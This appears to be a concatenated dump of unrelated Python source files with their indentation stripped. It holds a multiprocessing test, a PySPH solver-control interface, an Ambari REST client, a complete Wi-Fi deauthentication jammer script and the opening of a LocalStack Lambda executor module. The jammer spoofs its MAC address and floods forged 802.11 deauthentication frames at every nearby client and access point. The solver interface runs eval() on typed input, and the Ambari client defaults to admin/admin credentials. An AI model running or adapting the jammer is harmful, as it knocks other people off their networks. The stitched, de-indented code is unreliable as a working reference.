count_returns = Value('i', 0, lock=True)
# Emulates the work item on pool, run by the pool worker proc.
# Delegates the dangerous stuff to a subproc. We test the full
# pattern using tee_to_pipe_decorator() even though we may not
# have all of sig term, exception, and return in one app.
def parent_entry(id: int):
global count_terms, count_exceptions, count_returns
parent_conn, child_conn = Pipe()
work_proc = multiprocessing.Process(
target=tee_to_pipe_decorator(work_entry, child_conn),
args=(id,))
work_proc.start()
_, status = os.waitpid(work_proc.pid, 0)
if os.WIFSIGNALED(status):
signum = os.WTERMSIG(status)
assert signum == 11
assert not parent_conn.poll()
logger.debug("TERM")
with count_terms.get_lock():
count_terms.value += 1
else:
assert os.WIFEXITED(status)
# We either have a return value or an exception
assert parent_conn.poll()
obj = parent_conn.recv()
if isinstance(obj, Exception):
logger.debug("EXCEPTION")
with count_exceptions.get_lock():
count_exceptions.value += 1
# Making sure it's actually raisable else this pool proc dies
# and we deadlock outside.
try:
raise obj
except Exception as e:
logger.debug("CAUGHT MYSELF: {0}".format(e))
else:
# This would fail if obj were not the successful return type.
assert obj[0] == 123
assert obj[1] == 456
logger.debug("RETURN")
with count_returns.get_lock():
count_returns.value += 1
parent_conn.close()
child_conn.close()
logger.debug("Parent {0} is returning".format(id))
return None
def work_entry(somearg: int) -> Tuple[int, int]:
if random.choice(["succeed", "segv"]) == "succeed":
if random.choice(["succeed", "throw"]) == "succeed":
return 123, 456
else:
raise FailedRecognitionError("a failed recognition")
else:
lib = cdll.LoadLibrary(libblah_path)
lib.foo()
return 123, 456
count_pool_success = 0
count_pool_errors = 0
def on_finish(anything: Any):
global count_pool_success
lock.acquire()
count_pool_success += 1
lock.release()
def on_error(anything: Any):
global count_pool_errors
lock.acquire()
count_pool_errors += 1
lock.release()
class TestPoolWithTee(unittest.TestCase):
global count_pool_success, count_pool_errors
global count_terms, count_exceptions, count_returns
def test_NonDaemonicPool_with_tee_to_pipe(self):
        # Sometimes disabled (by uncommenting the return below) because we know it works
        # and it interferes with other tests running in parallel (need to prevent that).
        # return
pool_procs = 4
num_tasks = 100
p = NonDaemonicPool(pool_procs)
for i in range(num_tasks):
p.apply_async(parent_entry, [i], callback=on_finish, error_callback=on_error)
p.close()
p.join()
logger.debug("Final count_pool_success: {0}".format(count_pool_success))
logger.debug("Final count_pool_errors: {0}".format(count_pool_errors))
assert count_pool_success == num_tasks
assert count_pool_errors == 0
# Ensure we saw at least one of each.
logger.debug("Final count_exceptions: {0}".format(count_exceptions.value))
logger.debug("Final count_returns: {0}".format(count_returns.value))
logger.debug("Final count_terms: {0}".format(count_terms.value))
assert count_exceptions.value > 0
assert count_returns.value > 0
assert count_terms.value > 0
assert count_exceptions.value + count_returns.value + count_terms.value == num_tasks
if __name__ == '__main__':
multiprocessing.set_start_method('fork')
unittest.main()
|
solver_interfaces.py
|
import threading
import os
import socket
try:
from SimpleXMLRPCServer import (SimpleXMLRPCServer,
SimpleXMLRPCRequestHandler)
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
# Python 3.x
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from http.server import SimpleHTTPRequestHandler
from multiprocessing.managers import BaseManager, BaseProxy
def get_authkey_bytes(authkey):
if isinstance(authkey, bytes):
return authkey
else:
return authkey.encode('utf-8')
class MultiprocessingInterface(BaseManager):
""" A multiprocessing interface to the solver controller
This object exports a controller instance proxy over the multiprocessing
interface. Control actions can be performed by connecting to the interface
and calling methods on the controller proxy instance """
def __init__(self, address=None, authkey=None, try_next_port=False):
authkey = get_authkey_bytes(authkey)
BaseManager.__init__(self, address, authkey)
self.authkey = authkey
self.try_next_port = try_next_port
def get_controller(self):
return self.controller
def start(self, controller):
self.controller = controller
self.register('get_controller', self.get_controller)
if not self.try_next_port:
self.get_server().serve_forever()
host, port = self.address
while self.try_next_port:
try:
BaseManager.__init__(self, (host, port), self.authkey)
self.get_server().serve_forever()
self.try_next_port = False
except socket.error as e:
try_next_port = False
import errno
if e.errno == errno.EADDRINUSE:
port += 1
else:
raise
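# Illustrative sketch (not part of the original module): exporting a running solver's
# controller over this interface. The `controller` object and the address/authkey
# values are placeholders for whatever the application actually uses.
def _example_serve_controller(controller):
    interface = MultiprocessingInterface(address=('0.0.0.0', 8800),
                                         authkey='pysph', try_next_port=True)
    interface.start(controller)   # blocks, serving the controller proxy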
class MultiprocessingClient(BaseManager):
""" A client for the multiprocessing interface
Override the run() method to do appropriate actions on the proxy
instance of the controller object or add an interface using the
add_interface methods similar to the Controller.add_interface method """
def __init__(self, address=None, authkey=None, serializer='pickle',
start=True):
authkey = get_authkey_bytes(authkey)
BaseManager.__init__(self, address, authkey, serializer)
if start:
self.start()
def start(self, connect=True):
self.interfaces = []
# to work around a python caching bug
# http://stackoverflow.com/questions/3649458/broken-pipe-when-using-python-multiprocessing-managers-basemanager-syncmanager
if self.address in BaseProxy._address_to_local:
del BaseProxy._address_to_local[self.address][0].connection
self.register('get_controller')
if connect:
self.connect()
self.controller = self.get_controller()
self.run(self.controller)
@staticmethod
def is_available(address):
try:
socket.create_connection(address, 1).close()
return True
except socket.error:
return False
def run(self, controller):
pass
def add_interface(self, callable):
""" This makes it act as substitute for the actual command_manager """
thr = threading.Thread(target=callable, args=(self.controller,))
thr.daemon = True
thr.start()
return thr
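# Illustrative sketch (not part of the original module): connecting to the interface
# served above and reading a value from the controller proxy. The 'count' property
# mirrors the one used by CommandlineInterface below; address/authkey are placeholders.
def _example_query_controller():
    client = MultiprocessingClient(address=('localhost', 8800), authkey='pysph')
    return client.controller.get('count')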
class CrossDomainXMLRPCRequestHandler(SimpleXMLRPCRequestHandler,
SimpleHTTPRequestHandler):
""" SimpleXMLRPCRequestHandler subclass which attempts to do CORS
CORS is Cross-Origin-Resource-Sharing (http://www.w3.org/TR/cors/)
which enables xml-rpc calls from a different domain than the xml-rpc server
(such requests are otherwise denied)
"""
def do_OPTIONS(self):
""" Implement the CORS pre-flighted access for resources """
self.send_response(200)
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Access-Control-Allow-METHODS", "POST,GET,OPTIONS")
# self.send_header("Access-Control-Max-Age", "60")
self.send_header("Content-length", "0")
self.end_headers()
def do_GET(self):
""" Handle http requests to serve html/image files only """
print(self.path, self.translate_path(self.path))
permitted_extensions = ['.html', '.png', '.svg', '.jpg', '.js']
if not os.path.splitext(self.path)[1] in permitted_extensions:
self.send_error(404, 'File Not Found/Allowed')
else:
SimpleHTTPRequestHandler.do_GET(self)
def end_headers(self):
""" End response header with adding Access-Control-Allow-Origin
This is done to enable CORS request from all clients """
self.send_header("Access-Control-Allow-Origin", "*")
SimpleXMLRPCRequestHandler.end_headers(self)
class XMLRPCInterface(SimpleXMLRPCServer):
""" An XML-RPC interface to the solver controller
Currently cannot work with objects which cannot be marshalled
(which is basically most custom classes, most importantly
ParticleArray and numpy arrays) """
def __init__(self, addr, requestHandler=CrossDomainXMLRPCRequestHandler,
logRequests=True, allow_none=True,
encoding=None, bind_and_activate=True):
SimpleXMLRPCServer.__init__(self, addr, requestHandler, logRequests,
allow_none, encoding, bind_and_activate)
def start(self, controller):
self.register_instance(controller, allow_dotted_names=False)
self.register_introspection_functions()
self.serve_forever()
class CommandlineInterface(object):
""" command-line interface to the solver controller """
def start(self, controller):
while True:
try:
try:
inp = raw_input('pysph[%d]>>> ' % controller.get('count'))
except NameError:
inp = input('pysph[%d]>>> ' % controller.get('count'))
cmd = inp.strip().split()
try:
cmd, args = cmd[0], cmd[1:]
except Exception as e:
print('Invalid command')
self.help()
continue
args2 = []
for arg in args:
try:
arg = eval(arg)
except:
pass
finally:
args2.append(arg)
if cmd == 'p' or cmd == 'pause':
controller.pause_on_next()
elif cmd == 'c' or cmd == 'cont':
controller.cont()
elif cmd == 'g' or cmd == 'get':
print(controller.get(args[0]))
elif cmd == 's' or cmd == 'set':
print(controller.set(args[0], args2[1]))
elif cmd == 'q' or cmd == 'quit':
break
else:
print(getattr(controller, cmd)(*args2))
except Exception as e:
self.help()
print(e)
def help(self):
print('''Valid commands are:
p | pause
c | cont
g | get <name>
s | set <name> <value>
q | quit -- quit commandline interface (solver keeps running)''')
|
client.py
|
import requests
from threading import Thread
import time
import sys
class Client(object):
def __init__(self,
url='http://localhost:8080',
username='admin',
passwd='admin',
operation_interval=10,
retry_refused=False,
retry_interval=3,
retry_timeout=90
):
self.url=url+'/api/v1'
self.username=username
self.passwd=passwd
self.retry_interval=retry_interval
self.operation_interval=operation_interval
self.retry_timeout=retry_timeout
self.retry_refused=retry_refused
self._stacks=None
#curl -u admin:passwd -H 'X-Requested-By: ambari' -X PUT -d '{"RequestInfo": {"context" :"Stop service "}, "Body": {"ServiceInfo": {"state": "INSTALLED"}}}' http://<AMBARI_SERVER_HOSTNAME>:8080/api/v1/clusters/<CLUSTER_NAME>/services/<Service_name>
def request(self,url='',data=None,call_method=None,status_code=None,wait=False):
kwargs={
'url':self.url+url,
'headers': {'X-Requested-By': 'ambari'},
'auth': (self.username,self.passwd)
}
if data:
kwargs['data']=data
if not call_method:
call_method=requests.put
elif not call_method:
call_method=requests.get
mustend = time.time() + self.retry_timeout
while time.time() < mustend:
try:
ret = call_method(**kwargs)
except requests.ConnectionError as ce:
if self.retry_refused:
time.sleep(self.retry_interval)
else:
raise ce
else:
print(call_method.__name__,self.url+url,ret)
condition=status_code if status_code else requests.codes.ok
if ret.status_code == condition:
if ret.text:
ret = ret.json()
if wait: time.sleep(self.operation_interval)
else:
ret=False
return ret
        raise Exception('request to {} timed out after {} seconds'.format(self.url+url, self.retry_timeout))
def check(self,url='',data=None,call_method=None,status_code=None,wait=False):
mustend = time.time() + self.retry_timeout
while time.time() < mustend:
ret=self.request(url,data=data,call_method=call_method,status_code=status_code,wait=wait)
if ret: return ret
time.sleep(self.retry_interval)
raise Exception('check error!')
@property
def stack_info(self):
return self.request('/stacks')['items']
@property
def stacks(self):
if self._stacks is None:
self._stacks=[]
for s in self.stack_info:
name=s['Stacks']['stack_name']
vs=self.request('/stacks/'+name)['versions']
for v in vs:
version=v['Versions']['stack_version']
self._stacks.append(Stack(client=self,name=name,version=version))
return self._stacks
@property
def cluster_info(self):
return self.request('/clusters')['items']
def get_cluster_stack(self,cluster_name):
stack_info=self.request('/clusters/'+cluster_name)['stack_versions'][0]['ClusterStackVersions']
for s in self.stacks:
if s.name==stack_info['stack'] and s.version==stack_info['version']:
return s
return None
@property
def clusters(self):
cs=[]
for c in self.cluster_info:
name=c['Clusters']['cluster_name']
cs.append(Cluster(client=self,name=name,stack=self.get_cluster_stack(name)))
return cs
@property
def cluster(self):
return self.clusters[-1]
def create_cluster(self,cluster_name,stack):
c=Cluster(name=cluster_name,client=self,stack=stack)
c.create()
return c
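# Illustrative sketch (not part of the original module): a typical session with the
# Ambari client defined above. The service name 'HDFS' and the connection details
# are placeholders.
def _example_ambari_session():
    c = Client(url='http://localhost:8080', username='admin', passwd='admin')
    cluster = c.cluster                 # most recently listed cluster
    hdfs = cluster.get_service('HDFS')  # ClusterService instance (defined below)
    hdfs.stop()
    hdfs.start()
    return cluster.hosts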
class Stack(object):
def __init__(self,client,name,version):
self._info=None
self.client=client
self.name=name
self.version=version
self.url="/stacks/{}/versions/{}".format(self.name,self.version)
@property
def info(self):
if not self._info:
self._info=self.client.request(self.url)
return self._info
@property
def services(self):
srvs=[]
for s in self.info['services']:
srvs.append(StackService(stack=self,name=s['StackServices']['service_name']))
return srvs
class StackService(object):
def __init__(self,stack,name):
self.stack=stack
self.name=name
self.url=self.stack.url+"/services/"+self.name
self._info=None
@property
def info(self):
if not self._info:
self._info=self.stack.client.request(self.url)
return self._info
@property
def components(self):
cpns=[]
for cpn in self.info['components']:
cpns.append(StackServiceComponent(service=self,name=cpn['StackServiceComponents']['component_name']))
return cpns
class StackServiceComponent(object):
def __init__(self,service,name):
self.service=service
self.name=name
self.url=self.service.url+'/components/'+self.name
@property
def info(self):
return self.service.stack.client.request(self.url)
class Cluster(object):
def __init__(self,client,stack,name):
self._info=None
self._hosts=None
self._services=None
self.client=client
self.stack=stack
self.name=name
self.url='/clusters/'+name
def create(self):
data = '{"Clusters":{"version":"'+self.stack.name+'-'+self.stack.version+'"}}'
return self.client.request(self.url,data=data,call_method=requests.post,wait=True)
@property
def info(self):
if not self._info:
self._info=self.client.request(self.url)
return self._info
@property
def services(self):
if self._services is None:
self._services=[]
for s in self.info['services']:
self._services.append(ClusterService(cluster=self,name=s['ServiceInfo']['service_name']))
return self._services
@property
def hosts(self):
if self._hosts is None:
self._hosts=[]
for h in self.info['hosts']:
self._hosts.append(Host(cluster=self,name=h['Hosts']['host_name']))
return self._hosts
def get_host(self,host_name):
for h in self.hosts:
if h.name==host_name:
return h
return None
def get_service(self,service_name):
for s in self.services:
if s.name==service_name:
return s
return None
def start(self):
data='{"RequestInfo":{"context":"_PARSE_.START.ALL_SERVICES","operation_level":{"level":"CLUSTER","cluster_name":"'+self.name+'"}},"Body":{"ServiceInfo":{"state":"STARTED"}}}'
return self.client.check(self.url+"/services",data,status_code=202,wait=True)
def stop(self):
data='{"RequestInfo":{"context":"_PARSE_.STOP.ALL_SERVICES","operation_level":{"level":"CLUSTER","cluster_name":"'+self.name+'"}},"Body":{"ServiceInfo":{"state":"INSTALLED"}}}'
return self.client.request(self.url+"/services",data,wait=True)
def register_host(self,host_name):
h=Host(cluster=self, name=host_name)
h.register()
return h
def clone_host(self,from_host_name,to_host_name):
h=Host(cluster=self, name=to_host_name)
h.clone(self.get_host(from_host_name))
return h
def remove_host(self,host_name):
self.get_host(host_name).remove()
class ClusterService(object):
def __init__(self,cluster,name):
self._info=None
self.cluster=cluster
self.name=name
self.url=self.cluster.url+"/services/"+self.name
@property
def info(self):
if not self._info:
self._info=self.cluster.client.request(self.url)
return self._info
@property
def components(self):
cs=[]
for c in self.info['components']:
cs.append(ClusterServiceComponent(service=self,name=c['ServiceComponentInfo']['component_name']))
return cs
@property
def status(self):
return self.cluster.client.request(self.url+'?fields=ServiceInfo/state')['ServiceInfo']['state']
def maintenance_on(self):
data='{"RequestInfo":{"context":"Turn on Maintenance for '+self.name+'"},"Body":{"ServiceInfo":{"maintenance_state":"ON"}}}'
return self.cluster.client.check(self.url,data,wait=True)
def maintenance_off(self):
data='{"RequestInfo":{"context":"Turn off Maintenance for '+self.name+'"},"Body":{"ServiceInfo":{"maintenance_state":"OFF"}}}'
return self.cluster.client.check(self.url,data,wait=True)
def start(self):
data='{"RequestInfo": {"context" :"Start service"}, "Body": {"ServiceInfo": {"state": "STARTED"}}}'
return self.cluster.client.check(self.url,data,status_code=202,wait=True)
def stop(self):
data='{"RequestInfo": {"context" :"Stop service"}, "Body": {"ServiceInfo": {"state": "INSTALLED"}}}'
return self.cluster.client.request(self.url,data,wait=True)
class ClusterServiceComponent(object):
def __init__(self,service,name):
self.service=service
self.name=name
self.url=self.service.url+'/components/'+self.name
@property
def info(self):
return self.service.cluster.client.request(self.url)
@property
def host_components(self):
hs=[]
for c in self.info['host_components']:
hs.append(HostComponent(name=c['HostRoles']['component_name'],host=self.service.cluster.get_host(c['HostRoles']['host_name'])))
return hs
class Host(object):
def __init__(self,cluster,name):
self._info=None
self.cluster=cluster
self.name=name
self.url=self.cluster.url+"/hosts/"+self.name
@property
def info(self):
if not self._info:
self._info=self.cluster.client.request(self.url)
return self._info
@property
def components(self):
if 'host_components' not in self.info: return ()
cmpns=[]
for c in self.info['host_components']:
cmpns.append(HostComponent(host=self,name=c['HostRoles']['component_name']))
return cmpns
def register(self):
self.cluster.client.check(self.url,call_method=requests.post,status_code=201,wait=True)
self.cluster._hosts.append(self)
def remove(self):
print('host_delete({})'.format(self.name))
        for c in self.components:
            c.stop()
            if not c.remove():
return False
self.cluster.client.check(self.url,call_method=requests.delete,wait=True)
self.cluster.client.check(self.url,status_code=404)
self.cluster._hosts.remove(self)
def clone(self,from_host):
        print('host_clone({},{})'.format(from_host.name,self.name))
self.register()
for c in from_host.components:
cpn=HostComponent(host=self, name=c.name)
Thread(target=cpn.install).start()
time.sleep(self.cluster.client.operation_interval)
class HostComponent(object):
def __init__(self,host,name):
self._info=None
self.host=host
self.name=name
self.url=self.host.url+'/host_components/'+self.name
@property
def info(self):
if not self._info:
self._info=self.host.cluster.client.check(self.url)
return self._info
@property
def service_name(self):
return self.info['HostRoles']['service_name']
    def install(self):
self.host.cluster.client.check(self.url,call_method=requests.post,status_code=201,wait=True)
data='{"RequestInfo":{"context":"Install '+self.name+'","operation_level":{"level":"HOST_COMPONENT","cluster_name":"'+self.host.cluster.name+'","host_name":"'+self.host.name+'","service_name":"'+self.service_name+'"}},"Body":{"HostRoles":{"state":"INSTALLED"}}}'
return self.host.cluster.client.check(self.url,data=data,status_code=202,wait=True)
def stop(self):
data='{"RequestInfo":{"context":"Stop Component"},"Body":{"HostRoles":{"state":"INSTALLED"}}}'
return self.host.cluster.client.check(self.url,data=data,status_code=200,wait=True)
def remove(self):
self.host.cluster.client.check(self.url,call_method=requests.delete)
return self.host.cluster.client.check(self.url,status_code=404,wait=True)
|
wifijammer_main.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import re
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i", "--interface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -i mon5")
parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -c 6")
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
parser.add_argument("-a", "--accesspoint", help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world", help="N. American standard is 11 channels but the rest of the world it's 13 so this options enables the scanning of 13 channels", action="store_true")
return parser.parse_args()
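# Illustrative usage (not part of the original script) of the options parsed above,
# assuming the file is saved as wifijammer.py:
#   python wifijammer.py                                    # deauth everything in range
#   python wifijammer.py -c 6 -a 00:11:22:33:44:55 -p 2
#   python wifijammer.py --world -t .00001 -s 00:11:BB:33:44:AA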
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('macchanger -r {}'.format(interface))
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
    On the first pass through the channels it pauses on each channel (without deauthing)
    so the deauth list can populate nicely; after that it hops as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
            if len(line) > 2: # iw dev shouldn't display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
if noise_filter(args.skip, pkt.addr1, pkt.addr2):
return
            # Control = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
        if args.world:
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
else:
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
lambda_executors.py
|
import os
import re
import sys
import glob
import json
import time
import logging
import threading
import traceback
import subprocess
import six
import base64
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker, long_uid,
now, to_str, to_bytes, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue
from localstack.utils.aws.dead_letter_queue import sqs_error_to_dead_letter_queue
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11, LAMBDA_RUNTIME_PROVIDED)
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
